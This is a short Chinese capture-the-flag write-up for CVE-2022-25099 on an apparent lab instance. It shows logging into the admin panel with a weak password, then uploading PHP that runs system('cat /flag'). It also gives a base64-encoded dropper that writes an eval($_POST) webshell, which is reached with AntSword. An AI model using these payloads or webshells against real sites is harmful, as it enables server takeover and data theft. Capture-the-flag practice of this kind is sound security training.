CVE-2022-25099

  1. 访问后台/admin 弱口令登录 admin 123456
  2. 尝试访问漏洞目录,发现无法访问
  3. 怀疑是没有文件。在后台上传一个马儿
  4. 正常的马儿上传不了。
  5. 上传<?php system('cat /flag');phpinfo();?>
  7. 或者写入
<?php
file_put_contents('a.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbYV0pOz8+'));
phpinfo();
?>

蚁剑连接,密码a
http://eci-2ze1vej67or6j4r0tuqh.cloudeci1.ichunqiu.com/admin/languages/a.php